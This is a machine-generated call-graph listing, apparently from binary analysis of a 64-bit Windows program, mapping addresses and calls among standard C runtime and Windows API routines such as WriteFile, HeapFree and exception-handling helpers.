18762->18772 18763->18772 18764->18772 18765 7fef9d3a7b0 WriteFile 18768 7fef9d3a857 GetLastError 18765->18768 18765->18773 18766 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18766->18775 18767->18759 18767->18772 18768->18773 18769 7fef9d3a158 GetLastError 18769->18772 18770 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18770->18775 18771 7fef9d3a06d WriteFile 18774 7fef9d3a103 GetLastError 18771->18774 18771->18775 18772->18755 18773->18757 18773->18765 18773->18772 18774->18772 18775->18756 18775->18766 18775->18769 18775->18770 18775->18771 18775->18772 18776 7fef9d3a1b5 GetLastError 18775->18776 18776->18772 17653 7fef9d270e6 17654 7fef9d27090 _exit 33 API calls 17653->17654 17655 7fef9d270f0 17654->17655 17205 7fef9d291ea 17206 7fef9d291ef 17205->17206 17207 7fef9d274e0 __crtExitProcess 3 API calls 17206->17207 17208 7fef9d29203 17207->17208 17209 7fef9d375e9 17212 7fef9d375fb 17209->17212 17214 7fef9d375f4 17209->17214 17210 7fef9d23280 __GSHandlerCheck 8 API calls 17211 7fef9d37d85 17210->17211 17213 7fef9d2bd70 _invalid_parameter 17 API calls 17212->17213 17213->17214 17214->17210 17666 7fef9d2d0ea 17667 7fef9d2d0ef 17666->17667 17668 7fef9d27090 _exit 33 API calls 17667->17668 17669 7fef9d2d209 17667->17669 17673 7fef9d2d0fc 17667->17673 17668->17669 17671 7fef9d2d289 17669->17671 17674 7fef9d23d00 RtlEncodePointer 17669->17674 17671->17673 17675 7fef9d29360 LeaveCriticalSection 17671->17675 17674->17671 17675->17673 17215 7fef9d25991 17216 7fef9d25996 _calloc_dbg_impl 17215->17216 17219 7fef9d2c020 17216->17219 17218 7fef9d259d5 17220 7fef9d2c039 _get_errno_from_oserr 17219->17220 17221 7fef9d2c03b HeapFree 17219->17221 17220->17218 17221->17220 17222 7fef9d2c05a GetLastError 17221->17222 17222->17220 17223 7fef9d2c990 17227 7fef9d24980 17223->17227 17225 7fef9d2c9b8 EncodePointer 17226 7fef9d2c9e5 17225->17226 17228 7fef9d249cb _calloc_dbg_impl 17227->17228 17228->17225 18276 7fef9d35393 18277 7fef9d353a0 18276->18277 18278 7fef9d353b4 __SehTransFilter 18277->18278 18279 7fef9d353cc 18277->18279 18285 7fef9d354a0 RaiseException 18278->18285 18286 7fef9d354a0 RaiseException 18279->18286 18282 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18284 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18282->18284 18283 7fef9d353ca 18283->18282 18285->18283 18286->18283 18804 7fef9d34a95 18806 7fef9d34aad __SehTransFilter 18804->18806 18805 7fef9d34c2b 18806->18805 18807 7fef9d35180 __SehTransFilter 38 API calls 18806->18807 18807->18805 18808 7fef9d32695 18810 7fef9d326a0 18808->18810 18809 7fef9d326ab 18810->18809 18811 7fef9d2bd70 _invalid_parameter 17 API calls 18810->18811 18811->18809 16482 7fef9d23599 16485 7fef9d28900 16482->16485 16484 7fef9d2359e 16486 7fef9d28920 16485->16486 16487 7fef9d28936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16485->16487 16486->16484 16488 7fef9d289de 16487->16488 16488->16486 16489 7fef9d24399 16490 7fef9d243a6 16489->16490 16492 7fef9d24377 16489->16492 16492->16489 16492->16490 16493 7fef9d2abb0 DecodePointer 16492->16493 16494 7fef9d2abd3 16493->16494 16494->16492 17687 7fef9d2c080 HeapValidate 17688 7fef9d2c0a2 17687->17688 17247 7fef9d3b580 17248 7fef9d3b5fa 17247->17248 17249 7fef9d3b6cb 17248->17249 17250 7fef9d3b676 17248->17250 17251 7fef9d3afb0 _fflush_nolock 17 API calls 17249->17251 17254 7fef9d3b6fe 17249->17254 17252 7fef9d2bd70 _invalid_parameter 17 API calls 17250->17252 17251->17254 17258 7fef9d3b6aa _LocaleUpdate::~_LocaleUpdate 17252->17258 17253 7fef9d3b84d 17255 7fef9d2bd70 _invalid_parameter 17 API calls 17253->17255 17254->17253 17256 7fef9d3b8a2 17254->17256 17255->17258 17257 7fef9d3b915 17256->17257 17263 7fef9d3b96a 17256->17263 17261 7fef9d2bd70 _invalid_parameter 17 API calls 17257->17261 17259 7fef9d23280 __GSHandlerCheck 8 API calls 17258->17259 17260 7fef9d3cd90 17259->17260 17261->17258 17262 7fef9d3cc93 17262->17258 17264 7fef9d2bd70 _invalid_parameter 17 API calls 17262->17264 17263->17262 17265 7fef9d3bada 17263->17265 17264->17258 17266 7fef9d2bd70 _invalid_parameter 17 API calls 17265->17266 17266->17258 18291 7fef9d3df8d 18293 7fef9d3dfbb 18291->18293 18292 7fef9d3eadf 18295 7fef9d3ef10 25 API calls 18292->18295 18293->18292 18294 7fef9d3eec0 25 API calls 18293->18294 18302 7fef9d3da75 18293->18302 18294->18292 18296 7fef9d3eafd 18295->18296 18297 7fef9d3eb33 18296->18297 18299 7fef9d3eec0 25 API calls 18296->18299 18298 7fef9d3ec29 18297->18298 18312 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18297->18312 18300 7fef9d3ebda 18298->18300 18301 7fef9d3ef10 25 API calls 18298->18301 18299->18297 18300->18302 18305 7fef9d3eec0 25 API calls 18300->18305 18301->18300 18303 7fef9d3eca1 18302->18303 18308 7fef9d3dbb5 18302->18308 18304 7fef9d2bd70 _invalid_parameter 17 API calls 18303->18304 18307 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18303->18307 18304->18307 18305->18302 18306 7fef9d23280 __GSHandlerCheck 8 API calls 18309 7fef9d3ed9e 18306->18309 18307->18306 18311 7fef9d2bd70 _invalid_parameter 17 API calls 18308->18311 18310 7fef9d3f000 wcsxfrm 2 API calls 18310->18312 18311->18307 18312->18300 18312->18310 18313 7fef9d3ee40 25 API calls 18312->18313 18313->18312 17689 7fef9d210b0 17691 7fef9d210da 17689->17691 17690 7fef9d210fc 17693 7fef9d23280 __GSHandlerCheck 8 API calls 17690->17693 17691->17690 17692 7fef9d21000 4 API calls 17691->17692 17692->17690 17694 7fef9d2112c 17693->17694 18314 7fef9d39fba 18326 7fef9d39c4d 18314->18326 18315 7fef9d3a06d WriteFile 18316 7fef9d3a103 GetLastError 18315->18316 18315->18326 18323 7fef9d39dd9 _dosmaperr __doserrno 18316->18323 18317 7fef9d23280 __GSHandlerCheck 8 API calls 18319 7fef9d3a9f5 18317->18319 18318 7fef9d39f66 WideCharToMultiByte 18320 7fef9d39fbf WriteFile 18318->18320 18318->18323 18322 7fef9d3a050 GetLastError 18320->18322 18320->18326 18321 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18321->18326 18322->18323 18323->18317 18324 7fef9d3a158 GetLastError 18324->18323 18325 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18325->18326 18326->18315 18326->18318 18326->18321 18326->18323 18326->18324 18326->18325 18327 7fef9d3a1b5 GetLastError 18326->18327 18327->18323 17695 7fef9d3bcbd 17696 7fef9d3b99c 17695->17696 17697 7fef9d3cc93 17696->17697 17702 7fef9d3bada 17696->17702 17698 7fef9d2bd70 _invalid_parameter 17 API calls 17697->17698 17701 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17697->17701 17698->17701 17699 7fef9d23280 __GSHandlerCheck 8 API calls 17700 7fef9d3cd90 17699->17700 17701->17699 17703 7fef9d2bd70 _invalid_parameter 17 API calls 17702->17703 17703->17701 17293 7fef9d3c1a3 17302 7fef9d3c1b0 get_int64_arg 17293->17302 17294 7fef9d3b99c 17295 7fef9d3cc93 17294->17295 17300 7fef9d3bada 17294->17300 17296 7fef9d2bd70 _invalid_parameter 17 API calls 17295->17296 17299 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17295->17299 17296->17299 17298 7fef9d23280 __GSHandlerCheck 8 API calls 17301 7fef9d3cd90 17298->17301 17299->17298 17303 7fef9d2bd70 _invalid_parameter 17 API calls 17300->17303 17302->17294 17304 7fef9d3b530 17302->17304 17303->17299 17307 7fef9d3b090 17304->17307 17306 7fef9d3b56c 17306->17302 17308 7fef9d3b0b7 17307->17308 17309 7fef9d3b168 17308->17309 17310 7fef9d3b1a6 _CrtMemDumpAllObjectsSince 17308->17310 17318 7fef9d3b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17308->17318 17311 7fef9d2bd70 _invalid_parameter 17 API calls 17309->17311 17312 7fef9d3b1cf 17310->17312 17313 7fef9d3b347 _CrtMemDumpAllObjectsSince 17310->17313 17311->17318 17317 7fef9d2bd70 _invalid_parameter 17 API calls 17312->17317 17312->17318 17314 7fef9d3b359 WideCharToMultiByte 17313->17314 17315 7fef9d3b3ab 17314->17315 17316 7fef9d3b3c1 GetLastError 17315->17316 17315->17318 17316->17318 17319 7fef9d3b3d0 _calloc_dbg_impl 17316->17319 17317->17318 17318->17306 17319->17318 17320 7fef9d2bd70 _invalid_parameter 17 API calls 17319->17320 17320->17318 17708 7fef9d3809f 17709 7fef9d380b0 _calloc_dbg_impl 17708->17709 17710 7fef9d38145 _calloc_dbg_impl 17708->17710 17710->17709 17711 7fef9d2bd70 _invalid_parameter 17 API calls 17710->17711 17711->17709 17712 7fef9d32c9f 17713 7fef9d32caf 17712->17713 17714 7fef9d32ca6 17712->17714 17714->17713 17715 7fef9d2bd70 _invalid_parameter 17 API calls 17714->17715 17715->17713 17716 7fef9d3d4a0 17717 7fef9d3d4b7 std::bad_exception::~bad_exception 17716->17717 17718 7fef9d3d4cc 17717->17718 17719 7fef9d3d710 _Ref_count LeaveCriticalSection 17717->17719 17719->17718 18328 7fef9d3a7a0 18336 7fef9d3a61f 18328->18336 18329 7fef9d3a726 WideCharToMultiByte 18330 7fef9d3a791 GetLastError 18329->18330 18329->18336 18331 7fef9d3a887 _dosmaperr __doserrno 18330->18331 18332 7fef9d23280 __GSHandlerCheck 8 API calls 18331->18332 18335 7fef9d3a9f5 18332->18335 18333 7fef9d3a7b0 WriteFile 18334 7fef9d3a857 GetLastError 18333->18334 18333->18336 18334->18336 18336->18329 18336->18331 18336->18333 16665 7fef9d2aca8 16666 7fef9d2acb2 16665->16666 16667 7fef9d274e0 __crtExitProcess 3 API calls 16666->16667 16668 7fef9d2acbc RtlAllocateHeap 16667->16668 17724 7fef9d25cad 17727 7fef9d25cb8 17724->17727 17726 7fef9d26201 17728 7fef9d25e1a _realloc_dbg 17727->17728 17729 7fef9d29360 LeaveCriticalSection 17727->17729 17729->17726 18349 7fef9d23faa 18350 7fef9d23e30 LeaveCriticalSection 18349->18350 18351 7fef9d23fb6 GetCurrentThreadId 18350->18351 18352 7fef9d23fea SetLastError 18351->18352 18353 7fef9d2cb4f 18358 7fef9d2cb5c 18353->18358 18354 7fef9d23280 __GSHandlerCheck 8 API calls 18355 7fef9d2cf0f 18354->18355 18356 7fef9d2cbeb GetStdHandle 18357 7fef9d2cc94 18356->18357 18360 7fef9d2cc07 std::exception::_Copy_str 18356->18360 18357->18354 18358->18356 18358->18357 18359 7fef9d2cc99 18358->18359 18359->18357 18361 7fef9d31640 17 API calls 18359->18361 18360->18357 18363 7fef9d2cc73 WriteFile 18360->18363 18362 7fef9d2cd10 18361->18362 18364 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18362->18364 18363->18357 18365 7fef9d2cd3d GetModuleFileNameW 18364->18365 18366 7fef9d2cd68 18365->18366 18371 7fef9d2cdb1 18365->18371 18367 7fef9d31640 17 API calls 18366->18367 18368 7fef9d2cd84 18367->18368 18369 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18368->18369 18369->18371 18370 7fef9d2ce5e 18372 7fef9d32d80 17 API calls 18370->18372 18371->18370 18382 7fef9d33380 18371->18382 18373 7fef9d2ce76 18372->18373 18374 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18373->18374 18376 7fef9d2cea3 18374->18376 18378 7fef9d32d80 17 API calls 18376->18378 18377 7fef9d2ce31 18379 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18377->18379 18380 7fef9d2ceb9 18378->18380 18379->18370 18381 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18380->18381 18381->18357 18384 7fef9d333a6 18382->18384 18383 7fef9d3342f 18385 7fef9d2bd70 _invalid_parameter 17 API calls 18383->18385 18384->18383 18386 7fef9d3346d _calloc_dbg_impl 18384->18386 18389 7fef9d333bc _calloc_dbg_impl 18384->18389 18385->18389 18387 7fef9d335fb 18386->18387 18386->18389 18390 7fef9d33639 _calloc_dbg_impl 18386->18390 18388 7fef9d2bd70 _invalid_parameter 17 API calls 18387->18388 18388->18389 18389->18377 18390->18389 18391 7fef9d2bd70 _invalid_parameter 17 API calls 18390->18391 18391->18389 17739 7fef9d25854 17740 7fef9d2585b _calloc_dbg_impl 17739->17740 17741 7fef9d2c020 _free_base 2 API calls 17740->17741 17742 7fef9d259d5 17741->17742 17321 7fef9d40550 17322 7fef9d40575 17321->17322 17323 7fef9d4055e 17321->17323 17323->17322 17324 7fef9d40568 CloseHandle 17323->17324 17324->17322 18829 7fef9d3465b 18839 7fef9d3445a __SehTransFilter 18829->18839 18830 7fef9d347d7 18831 7fef9d3485b 18830->18831 18832 7fef9d2cf80 _inconsistency 36 API calls 18830->18832 18832->18831 18833 7fef9d3466c __SehTransFilter 18833->18830 18834 7fef9d35bb0 __SehTransFilter 36 API calls 18833->18834 18835 7fef9d34727 18834->18835 18835->18830 18836 7fef9d2e500 __SetUnwindTryBlock 37 API calls 18835->18836 18837 7fef9d34767 18836->18837 18838 7fef9d2edc0 __SehTransFilter 9 API calls 18837->18838 18838->18830 18839->18833 18840 7fef9d35180 __SehTransFilter 38 API calls 18839->18840 18840->18839 17325 7fef9d3595c 17326 7fef9d2cf50 terminate 35 API calls 17325->17326 17327 7fef9d35961 17326->17327 17743 7fef9d2a057 17744 7fef9d2a061 17743->17744 17745 7fef9d2a234 17744->17745 17752 7fef9d2a08e __initmbctable 17744->17752 17747 7fef9d2a25d IsValidCodePage 17745->17747 17751 7fef9d2a22d __initmbctable 17745->17751 17746 7fef9d23280 __GSHandlerCheck 8 API calls 17748 7fef9d2a470 17746->17748 17749 7fef9d2a27b GetCPInfo 17747->17749 17747->17751 17750 7fef9d2a295 __initmbctable 17749->17750 17749->17751 17754 7fef9d2a5e0 __initmbctable 19 API calls 17750->17754 17751->17746 17753 7fef9d2a5e0 __initmbctable 19 API calls 17752->17753 17753->17751 17754->17751 18419 7fef9d25357 18422 7fef9d29360 LeaveCriticalSection 18419->18422 18421 7fef9d25361 18422->18421 17760 7fef9d2405b 17762 7fef9d2406e 17760->17762 17766 7fef9d29360 LeaveCriticalSection 17762->17766 17764 7fef9d24224 17765 7fef9d241bb _updatetlocinfoEx_nolock 17767 7fef9d29360 LeaveCriticalSection 17765->17767 17766->17765 17767->17764 17328 7fef9d2e55a 17329 7fef9d2e564 17328->17329 17330 7fef9d2e5c2 RtlLookupFunctionEntry 17329->17330 17331 7fef9d2e601 17329->17331 17330->17331 18841 7fef9d2425a FlsGetValue FlsSetValue 18842 7fef9d24283 18841->18842 16617 7fef9d27640 GetStartupInfoW 16619 7fef9d27676 _calloc_dbg 16617->16619 16618 7fef9d27ce0 SetHandleCount 16629 7fef9d27689 16618->16629 16621 7fef9d27ab9 16619->16621 16627 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16619->16627 16628 7fef9d27a19 GetFileType 16619->16628 16619->16629 16620 7fef9d27b95 GetStdHandle 16622 7fef9d27bb9 16620->16622 16624 7fef9d27c7b 16620->16624 16621->16618 16621->16620 16621->16624 16623 7fef9d27bc8 GetFileType 16622->16623 16622->16624 16623->16624 16625 7fef9d27beb InitializeCriticalSectionAndSpinCount 16623->16625 16624->16618 16625->16624 16625->16629 16627->16621 16627->16629 16628->16621 16628->16627 17332 7fef9d21140 17333 7fef9d2116a 17332->17333 17334 7fef9d2118c 17333->17334 17335 7fef9d2119a FileTimeToSystemTime 17333->17335 17337 7fef9d23280 __GSHandlerCheck 8 API calls 17334->17337 17335->17334 17336 7fef9d211ae 17335->17336 17340 7fef9d21000 GetThreadLocale GetDateFormatA 17336->17340 17339 7fef9d211d0 17337->17339 17341 7fef9d21062 GetThreadLocale GetTimeFormatA 17340->17341 17342 7fef9d2105b 17340->17342 17341->17342 17342->17334 17768 7fef9d28040 17769 7fef9d28056 17768->17769 17770 7fef9d2805b GetModuleFileNameA 17768->17770 17771 7fef9d2aa40 __initmbctable 24 API calls 17769->17771 17772 7fef9d28083 17770->17772 17771->17770 18843 7fef9d29240 18844 7fef9d2925f 18843->18844 18845 7fef9d2924d 18843->18845 18846 7fef9d29281 InitializeCriticalSectionAndSpinCount 18844->18846 18847 7fef9d29295 18844->18847 18846->18847 18849 7fef9d29360 LeaveCriticalSection 18847->18849 18849->18845 18850 7fef9d2ae40 18851 7fef9d2d490 std::exception::_Copy_str 17 API calls 18850->18851 18852 7fef9d2ae59 18851->18852 18853 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18852->18853 18854 7fef9d2ae86 std::exception::_Copy_str 18853->18854 18855 7fef9d30fd0 17 API calls 18854->18855 18858 7fef9d2af3a std::exception::_Copy_str 18854->18858 18856 7fef9d2af0d 18855->18856 18857 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18856->18857 18857->18858 18860 7fef9d2b2e0 18858->18860 18861 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18858->18861 18859 7fef9d2b33e 18863 7fef9d30cc0 25 API calls 18859->18863 18860->18859 18862 7fef9d2d490 std::exception::_Copy_str 17 API calls 18860->18862 18861->18860 18864 7fef9d2b311 18862->18864 18865 7fef9d2b358 18863->18865 18866 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18864->18866 18867 7fef9d2b37d 18865->18867 18868 7fef9d2cff0 terminate 34 API calls 18865->18868 18866->18859 18871 7fef9d23280 __GSHandlerCheck 8 API calls 18867->18871 18869 7fef9d2b373 18868->18869 18870 7fef9d27090 _exit 33 API calls 18869->18870 18870->18867 18872 7fef9d2b3a0 18871->18872 17343 7fef9d3f53e 17344 7fef9d3f55c 17343->17344 17345 7fef9d3f74d 17344->17345 17349 7fef9d40170 17344->17349 17347 7fef9d23280 __GSHandlerCheck 8 API calls 17345->17347 17348 7fef9d3f7c5 17347->17348 17350 7fef9d40185 17349->17350 17351 7fef9d3afb0 _fflush_nolock 17 API calls 17350->17351 17352 7fef9d401c7 17351->17352 17353 7fef9d401dc 17352->17353 17354 7fef9d3ab10 17 API calls 17352->17354 17355 7fef9d40326 17352->17355 17353->17345 17354->17355 17355->17353 17356 7fef9d39290 23 API calls 17355->17356 17356->17353 17773 7fef9d41040 17776 7fef9d2e8f0 17773->17776 17775 7fef9d4108f 17777 7fef9d2e90d 17776->17777 17780 7fef9d33cc0 17777->17780 17779 7fef9d2e980 17779->17775 17781 7fef9d33cdd 17780->17781 17783 7fef9d33d82 17781->17783 17784 7fef9d33ef3 __SehTransFilter 17781->17784 17795 7fef9d33d62 17781->17795 17785 7fef9d33dc8 17783->17785 17789 7fef9d33e40 17783->17789 17783->17795 17784->17795 17798 7fef9d340b0 17784->17798 17787 7fef9d33a60 __StateFromControlPc 36 API calls 17785->17787 17786 7fef9d2e790 __SehTransFilter 37 API calls 17786->17795 17788 7fef9d33dec 17787->17788 17792 7fef9d2cf80 _inconsistency 36 API calls 17788->17792 17794 7fef9d33e08 17788->17794 17790 7fef9d33e93 17789->17790 17791 7fef9d2cf80 _inconsistency 36 API calls 17789->17791 17796 7fef9d33ebd 17789->17796 17793 7fef9d34f20 __SehTransFilter 36 API calls 17790->17793 17791->17790 17792->17794 17793->17796 17797 7fef9d34f20 __SehTransFilter 36 API calls 17794->17797 17795->17779 17796->17786 17796->17795 17797->17795 17799 7fef9d33b40 __StateFromControlPc 36 API calls 17798->17799 17800 7fef9d340ea 17799->17800 17801 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17800->17801 17802 7fef9d34110 17801->17802 17843 7fef9d33c70 17802->17843 17805 7fef9d34133 __SetState 17846 7fef9d33c00 17805->17846 17806 7fef9d34176 17807 7fef9d33c70 __GetUnwindTryBlock 37 API calls 17806->17807 17808 7fef9d34174 17807->17808 17810 7fef9d2cf80 _inconsistency 36 API calls 17808->17810 17818 7fef9d341af _ValidateRead _SetThrowImageBase 17808->17818 17810->17818 17811 7fef9d347d9 17813 7fef9d347f3 17811->17813 17814 7fef9d34847 17811->17814 17820 7fef9d347d7 17811->17820 17812 7fef9d34347 17812->17811 17815 7fef9d343f5 17812->17815 17860 7fef9d34960 17813->17860 17817 7fef9d2cf50 terminate 35 API calls 17814->17817 17823 7fef9d3466c __SehTransFilter 17815->17823 17855 7fef9d2ea30 17815->17855 17817->17820 17818->17812 17819 7fef9d34235 17818->17819 17827 7fef9d2cf80 _inconsistency 36 API calls 17818->17827 17830 7fef9d3428e 17818->17830 17819->17795 17820->17819 17822 7fef9d2cf80 _inconsistency 36 API calls 17820->17822 17822->17819 17823->17820 17824 7fef9d35bb0 __SehTransFilter 36 API calls 17823->17824 17825 7fef9d34727 17824->17825 17825->17820 17826 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17825->17826 17828 7fef9d34767 17826->17828 17827->17830 17829 7fef9d2edc0 __SehTransFilter 9 API calls 17828->17829 17829->17820 17831 7fef9d2cf80 _inconsistency 36 API calls 17830->17831 17832 7fef9d342fa 17830->17832 17831->17832 17832->17812 17834 7fef9d35bb0 __SehTransFilter 36 API calls 17832->17834 17833 7fef9d34450 __SehTransFilter 17833->17823 17835 7fef9d35180 __SehTransFilter 38 API calls 17833->17835 17836 7fef9d34340 __SehTransFilter 17834->17836 17835->17833 17836->17812 17837 7fef9d34393 17836->17837 17838 7fef9d3435a __SehTransFilter 17836->17838 17839 7fef9d2cf50 terminate 35 API calls 17837->17839 17849 7fef9d34870 17838->17849 17839->17812 17844 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17843->17844 17845 7fef9d33c9c 17844->17845 17845->17805 17845->17806 17847 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17846->17847 17848 7fef9d33c31 17847->17848 17848->17808 17870 7fef9d3d4e0 17849->17870 17852 7fef9d3d320 17854 7fef9d3d375 17852->17854 17853 7fef9d3d3ba RaiseException 17853->17812 17854->17853 17856 7fef9d33b40 __StateFromControlPc 36 API calls 17855->17856 17857 7fef9d2ea6f 17856->17857 17858 7fef9d2cf80 _inconsistency 36 API calls 17857->17858 17859 7fef9d2ea7a 17857->17859 17858->17859 17859->17833 17862 7fef9d34990 17860->17862 17867 7fef9d3498b 17860->17867 17861 7fef9d349b2 __SehTransFilter 17863 7fef9d34a41 17861->17863 17864 7fef9d2cf80 _inconsistency 36 API calls 17861->17864 17861->17867 17862->17861 17873 7fef9d23d00 RtlEncodePointer 17862->17873 17865 7fef9d2ea30 __SehTransFilter 36 API calls 17863->17865 17864->17863 17868 7fef9d34a8e __SehTransFilter 17865->17868 17867->17820 17868->17867 17869 7fef9d35180 __SehTransFilter 38 API calls 17868->17869 17869->17867 17871 7fef9d3d660 std::exception::_Copy_str 17 API calls 17870->17871 17872 7fef9d3437d 17871->17872 17872->17852 17873->17861 17874 7fef9d3dc41 17875 7fef9d3ee40 25 API calls 17874->17875 17877 7fef9d3da75 17875->17877 17876 7fef9d3eca1 17878 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17876->17878 17879 7fef9d2bd70 _invalid_parameter 17 API calls 17876->17879 17877->17876 17881 7fef9d3dbb5 17877->17881 17880 7fef9d23280 __GSHandlerCheck 8 API calls 17878->17880 17879->17878 17882 7fef9d3ed9e 17880->17882 17883 7fef9d2bd70 _invalid_parameter 17 API calls 17881->17883 17883->17878 18873 7fef9d40e40 18874 7fef9d40e50 18873->18874 18876 7fef9d40e5e 18873->18876 18875 7fef9d23e00 3 API calls 18874->18875 18874->18876 18875->18876 17884 7fef9d2d04a 17885 7fef9d2d1d8 DecodePointer 17884->17885 17886 7fef9d2d1e8 17885->17886 17887 7fef9d27090 _exit 33 API calls 17886->17887 17888 7fef9d2d209 17886->17888 17892 7fef9d2d1f0 17886->17892 17887->17888 17890 7fef9d2d289 17888->17890 17893 7fef9d23d00 RtlEncodePointer 17888->17893 17890->17892 17894 7fef9d29360 LeaveCriticalSection 17890->17894 17893->17890 17894->17892 16228 7fef9d23471 16229 7fef9d234bc 16228->16229 16230 7fef9d2347a 16228->16230 16231 7fef9d23496 16230->16231 16240 7fef9d270b0 16230->16240 16243 7fef9d27d00 16231->16243 16238 7fef9d234a5 16238->16229 16239 7fef9d23e00 3 API calls 16238->16239 16239->16229 16253 7fef9d27280 16240->16253 16245 7fef9d27d0e 16243->16245 16244 7fef9d2349b 16247 7fef9d23e00 16244->16247 16245->16244 16246 7fef9d27d87 DeleteCriticalSection 16245->16246 16246->16245 16248 7fef9d23e23 16247->16248 16249 7fef9d23e0d FlsFree 16247->16249 16413 7fef9d290b0 16248->16413 16249->16248 16252 7fef9d288d0 HeapDestroy 16252->16238 16254 7fef9d27296 _exit 16253->16254 16255 7fef9d272c7 RtlDecodePointer 16254->16255 16261 7fef9d27368 _initterm 16254->16261 16274 7fef9d2744e 16254->16274 16259 7fef9d272e5 DecodePointer 16255->16259 16255->16261 16256 7fef9d2745e 16258 7fef9d270c3 16256->16258 16260 7fef9d27520 _exit LeaveCriticalSection 16256->16260 16258->16231 16270 7fef9d27314 16259->16270 16262 7fef9d27479 16260->16262 16261->16274 16277 7fef9d26210 16261->16277 16300 7fef9d274e0 16262->16300 16267 7fef9d2736d DecodePointer 16276 7fef9d23d00 RtlEncodePointer 16267->16276 16270->16261 16270->16267 16273 7fef9d27391 DecodePointer DecodePointer 16270->16273 16275 7fef9d23d00 RtlEncodePointer 16270->16275 16271 7fef9d27449 16290 7fef9d26f10 16271->16290 16273->16270 16274->16256 16297 7fef9d27520 16274->16297 16275->16270 16276->16270 16278 7fef9d26229 16277->16278 16279 7fef9d2628f 16278->16279 16280 7fef9d262cb 16278->16280 16303 7fef9d2bd70 DecodePointer 16279->16303 16307 7fef9d29360 LeaveCriticalSection 16280->16307 16283 7fef9d262c3 16283->16274 16284 7fef9d27100 16283->16284 16285 7fef9d27112 16284->16285 16286 7fef9d271e4 DecodePointer 16285->16286 16287 7fef9d271fe 16286->16287 16332 7fef9d23d00 RtlEncodePointer 16287->16332 16289 7fef9d27219 16289->16271 16333 7fef9d263e0 16290->16333 16292 7fef9d26f33 16293 7fef9d26f8e 16292->16293 16341 7fef9d26660 16292->16341 16295 7fef9d23280 __GSHandlerCheck 8 API calls 16293->16295 16296 7fef9d26fa7 16295->16296 16296->16274 16409 7fef9d29360 LeaveCriticalSection 16297->16409 16299 7fef9d2752e 16299->16256 16410 7fef9d27490 GetModuleHandleW 16300->16410 16304 7fef9d2bdd0 16303->16304 16305 7fef9d2bdac 16303->16305 16308 7fef9d2be00 16304->16308 16305->16283 16307->16283 16311 7fef9d2be50 16308->16311 16312 7fef9d2be81 __GSHandlerCheck 16311->16312 16313 7fef9d2be8d RtlCaptureContext RtlLookupFunctionEntry 16311->16313 16312->16313 16314 7fef9d2bf64 16313->16314 16315 7fef9d2bf1c RtlVirtualUnwind 16313->16315 16316 7fef9d2bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16314->16316 16315->16316 16317 7fef9d2bfde __GSHandlerCheck 16316->16317 16320 7fef9d23280 16317->16320 16319 7fef9d2be2d GetCurrentProcess TerminateProcess 16319->16305 16321 7fef9d23289 16320->16321 16322 7fef9d23294 16321->16322 16323 7fef9d23720 RtlCaptureContext RtlLookupFunctionEntry 16321->16323 16322->16319 16324 7fef9d237a5 16323->16324 16325 7fef9d23764 RtlVirtualUnwind 16323->16325 16326 7fef9d237c7 IsDebuggerPresent 16324->16326 16325->16326 16331 7fef9d28d90 16326->16331 16328 7fef9d23826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16329 7fef9d2384e GetCurrentProcess TerminateProcess 16328->16329 16330 7fef9d23844 __GSHandlerCheck 16328->16330 16329->16319 16330->16329 16331->16328 16332->16289 16334 7fef9d263f1 16333->16334 16335 7fef9d26447 16334->16335 16338 7fef9d26480 16334->16338 16336 7fef9d2bd70 _invalid_parameter 17 API calls 16335->16336 16337 7fef9d2647b 16336->16337 16337->16292 16340 7fef9d26504 16338->16340 16345 7fef9d29360 LeaveCriticalSection 16338->16345 16340->16292 16342 7fef9d26681 _CrtMemDumpAllObjectsSince 16341->16342 16346 7fef9d26850 16342->16346 16344 7fef9d26698 _LocaleUpdate::~_LocaleUpdate 16344->16293 16345->16337 16347 7fef9d26871 16346->16347 16348 7fef9d26ba6 16347->16348 16351 7fef9d268ed _CrtIsValidPointer 16347->16351 16376 7fef9d29360 LeaveCriticalSection 16348->16376 16350 7fef9d26bb0 16350->16344 16352 7fef9d2695e IsBadReadPtr 16351->16352 16353 7fef9d26976 16351->16353 16360 7fef9d2692f 16351->16360 16352->16353 16354 7fef9d26ad2 16353->16354 16355 7fef9d26a29 16353->16355 16356 7fef9d26b2d 16354->16356 16357 7fef9d26add 16354->16357 16358 7fef9d26abe 16355->16358 16359 7fef9d26a86 IsBadReadPtr 16355->16359 16356->16360 16363 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16356->16363 16362 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16357->16362 16364 7fef9d26bf0 16358->16364 16359->16358 16359->16360 16360->16344 16362->16360 16363->16360 16365 7fef9d26c28 16364->16365 16366 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 16365->16366 16367 7fef9d26c7a _CrtMemDumpAllObjectsSince 16365->16367 16368 7fef9d23280 __GSHandlerCheck 8 API calls 